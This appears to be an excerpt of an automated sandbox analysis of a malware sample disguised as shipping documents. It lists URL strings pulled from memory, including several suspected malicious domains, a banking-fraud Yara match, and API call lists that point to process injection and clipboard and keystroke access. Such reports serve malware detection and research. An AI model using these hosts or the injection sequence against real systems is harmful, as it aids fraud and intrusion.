                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000003D34000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000003644000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2740817749.0000000015A54000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?a1c8cf8ce51343444e7823fb95efe38e
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://iwqb.top
                Source: ktmutil.exe, 00000006.00000002.4559793375.0000000002DDD000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.2630890430.0000000002DF1000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.2630890430.0000000002E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: ktmutil.exe, 00000006.00000002.4559793375.0000000002DDD000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.2630890430.0000000002DF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: ktmutil.exe, 00000006.00000003.2630056953.0000000007B0B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: ktmutil.exe, 00000006.00000003.2630890430.0000000002DF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
                Source: ktmutil.exe, 00000006.00000003.2630890430.0000000002DF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf7&r
                Source: ktmutil.exe, 00000006.00000003.2630890430.0000000002DF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: ktmutil.exe, 00000006.00000003.2630890430.0000000002DF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=10335-2LMEM
                Source: ktmutil.exe, 00000006.00000002.4559793375.0000000002DDD000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.2630890430.0000000002DF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: ktmutil.exe, 00000006.00000003.2630890430.0000000002E06000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.4559793375.0000000002E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: ktmutil.exe, 00000006.00000003.2630890430.0000000002E06000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.4559793375.0000000002E06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ltqb.info
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgnxs.com
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ncxs.xyz
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://nfqb.info
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://oejqb.com
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ozxs.top
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/css/parking2.css
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-desplegar.jpg
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-facebook-small.png
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-hosting.png
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-parking.png
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-ssl-parking.png
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-twitter-small.png
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-web-sencilla.png
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://piensasolutions.com/imgs/parking/icon-web.png
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://plus.google.com/u/0/102310483732773374239
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://pmqb.xyz
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://shop.piensasolutions.com/search-ajax.php?utm_source=parking&amp;utm_medium=link&amp;utm_camp
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://stzqb.com
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://twitter.com/piensasolutions
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://wmqqb.com
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://wqxs.info
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.clarity.ms/tag/
                Source: ktmutil.exe, 00000006.00000003.2634284897.0000000007B2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000500C000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000006.00000002.4571566936.00000000060C0000.00000004.00000800.00020000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.000000000491C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: ktmutil.exe, 00000006.00000003.2634284897.0000000007B2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/certificado-ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campa
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/crear-web?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=we
                Source: C:\Users\user\Desktop\Shipping documents..exe, Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
                Source: C:\Users\user\Desktop\Shipping documents..exe, Code function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
                Source: C:\Users\user\Desktop\Shipping documents..exe, Code function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
                Source: C:\Users\user\Desktop\Shipping documents..exe, Code function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

                E-Banking Fraud

                Source: Yara match, File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000008.00000002.4571453200.0000000005690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.4568813272.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.2433270626.0000000003560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.4568990359.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.2432620170.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000004.00000002.4568829458.00000000051E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.4559476128.0000000002980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000002.00000002.2437565309.0000000006600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: initial sample, Static PE information: Filename: Shipping documents..exe
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0042C883 NtClose,2_2_0042C883
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03772B60 NtClose,LdrInitializeThunk,2_2_03772B60
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03772DF0
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03772C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03772C70
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037735C0 NtCreateMutant,LdrInitializeThunk,2_2_037735C0
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03774340 NtSetContextThread,2_2_03774340
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03774650 NtSuspendThread,2_2_03774650
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03772BF0 NtAllocateVirtualMemory,2_2_03772BF0
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03772BE0 NtQueryValueKey,2_2_03772BE0
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03772BA0 NtEnumerateValueKey,2_2_03772BA0
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03772B80 NtQueryInformationFile,2_2_03772B80
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03772AF0 NtWriteFile,2_2_03772AF0
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03772AD0 NtReadFile,2_2_03772AD0
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03772AB0 NtWaitForSingleObject,2_2_03772AB0
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03772F60 NtCreateProcessEx,2_2_03772F60
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03772F30 NtCreateSection,2_2_03772F30
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03772FE0 NtCreateFile,2_2_03772FE0
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03772FB0 NtResumeThread,2_2_03772FB0
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03772FA0 NtQuerySection,2_2_03772FA0
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03772F90 NtProtectVirtualMemory,2_2_03772F90
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03772E30 NtWriteVirtualMemory,2_2_03772E30
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03772EE0 NtQueueApcThread,2_2_03772EE0
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03772EA0 NtAdjustPrivilegesToken,2_2_03772EA0
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03772E80 NtReadVirtualMemory,2_2_03772E80
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03772D30 NtUnmapViewOfSection,2_2_03772D30
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03772D10 NtMapViewOfSection,2_2_03772D10
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03772D00 NtSetInformationFile,2_2_03772D00
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03772DD0 NtDelayExecution,2_2_03772DD0
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03772DB0 NtEnumerateKey,2_2_03772DB0
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03772C60 NtCreateKey,2_2_03772C60
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03772C00 NtQueryInformationProcess,2_2_03772C00
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03772CF0 NtOpenProcess,2_2_03772CF0
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03772CC0 NtQueryVirtualMemory,2_2_03772CC0
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03772CA0 NtQueryInformationToken,2_2_03772CA0
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03773010 NtOpenDirectoryObject,2_2_03773010
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03773090 NtSetValueKey,2_2_03773090
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037739B0 NtGetContextThread,2_2_037739B0
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03773D70 NtOpenThread,2_2_03773D70
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03773D10 NtOpenProcessToken,2_2_03773D10
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_03394340 NtSetContextThread,LdrInitializeThunk,6_2_03394340
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_03394650 NtSuspendThread,LdrInitializeThunk,6_2_03394650
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_03392B60 NtClose,LdrInitializeThunk,6_2_03392B60
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_03392BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_03392BA0
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_03392BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_03392BF0
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_03392BE0 NtQueryValueKey,LdrInitializeThunk,6_2_03392BE0
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_03392AF0 NtWriteFile,LdrInitializeThunk,6_2_03392AF0
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_03392AD0 NtReadFile,LdrInitializeThunk,6_2_03392AD0
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_03392F30 NtCreateSection,LdrInitializeThunk,6_2_03392F30
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_03392FB0 NtResumeThread,LdrInitializeThunk,6_2_03392FB0
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_03392FE0 NtCreateFile,LdrInitializeThunk,6_2_03392FE0
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_03392E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_03392E80
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_03392EE0 NtQueueApcThread,LdrInitializeThunk,6_2_03392EE0
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_03392D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_03392D30
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_03392D10 NtMapViewOfSection,LdrInitializeThunk,6_2_03392D10
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_03392DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03392DF0
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_03392DD0 NtDelayExecution,LdrInitializeThunk,6_2_03392DD0
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_03392C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03392C70
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_03392C60 NtCreateKey,LdrInitializeThunk,6_2_03392C60
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_03392CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_03392CA0
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_033935C0 NtCreateMutant,LdrInitializeThunk,6_2_033935C0
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_033939B0 NtGetContextThread,LdrInitializeThunk,6_2_033939B0
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_03392B80 NtQueryInformationFile,6_2_03392B80
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_03392AB0 NtWaitForSingleObject,6_2_03392AB0
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_03392F60 NtCreateProcessEx,6_2_03392F60
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_03392FA0 NtQuerySection,6_2_03392FA0
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_03392F90 NtProtectVirtualMemory,6_2_03392F90
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_03392E30 NtWriteVirtualMemory,6_2_03392E30
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_03392EA0 NtAdjustPrivilegesToken,6_2_03392EA0
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_03392D00 NtSetInformationFile,6_2_03392D00
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_03392DB0 NtEnumerateKey,6_2_03392DB0
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_03392C00 NtQueryInformationProcess,6_2_03392C00
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_03392CF0 NtOpenProcess,6_2_03392CF0
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_03392CC0 NtQueryVirtualMemory,6_2_03392CC0
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_03393010 NtOpenDirectoryObject,6_2_03393010
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_03393090 NtSetValueKey,6_2_03393090
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_03393D10 NtOpenProcessToken,6_2_03393D10
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_03393D70 NtOpenThread,6_2_03393D70
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_029A9280 NtCreateFile,6_2_029A9280
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_029A93F0 NtReadFile,6_2_029A93F0
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_029A9700 NtAllocateVirtualMemory,6_2_029A9700
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_029A94F0 NtDeleteFile,6_2_029A94F0
                Source: C:\Windows\SysWOW64\ktmutil.exe, Code function: 6_2_029A95A0 NtClose,6_2_029A95A0
                Source: C:\Users\user\Desktop\Shipping documents..exe, Code function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
                Source: C:\Users\user\Desktop\Shipping documents..exe, Code function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
                Source: C:\Users\user\Desktop\Shipping documents..exe, Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03378DBF6_2_03378DBF
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0335ADE06_2_0335ADE0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03360C006_2_03360C00
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03350CF26_2_03350CF2
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03400CB56_2_03400CB5
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0341132D6_2_0341132D
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0334D34C6_2_0334D34C
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033A739A6_2_033A739A
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033652A06_2_033652A0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_034012ED6_2_034012ED
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0337B2C06_2_0337B2C0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0342B16B6_2_0342B16B
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0334F1726_2_0334F172
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0339516C6_2_0339516C
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0336B1B06_2_0336B1B0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0340F0CC6_2_0340F0CC
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0341F0E06_2_0341F0E0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_034170E96_2_034170E9
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033670C06_2_033670C0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0341F7B06_2_0341F7B0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033A56306_2_033A5630
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_034116CC6_2_034116CC
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_034175716_2_03417571
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_034295C36_2_034295C3
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033FD5B06_2_033FD5B0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033514606_2_03351460
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0341F43F6_2_0341F43F
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0341FB766_2_0341FB76
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0337FB806_2_0337FB80
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0339DBF96_2_0339DBF9
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033D5BF06_2_033D5BF0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03417A466_2_03417A46
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0341FA496_2_0341FA49
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033D3A6C6_2_033D3A6C
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0340DAC66_2_0340DAC6
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033FDAAC6_2_033FDAAC
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033A5AA06_2_033A5AA0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03401AA36_2_03401AA3
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033F59106_2_033F5910
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033699506_2_03369950
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0337B9506_2_0337B950
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033CD8006_2_033CD800
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033638E06_2_033638E0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_0341FF096_2_0341FF09
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03361F926_2_03361F92
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03323FD26_2_03323FD2
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03323FD56_2_03323FD5
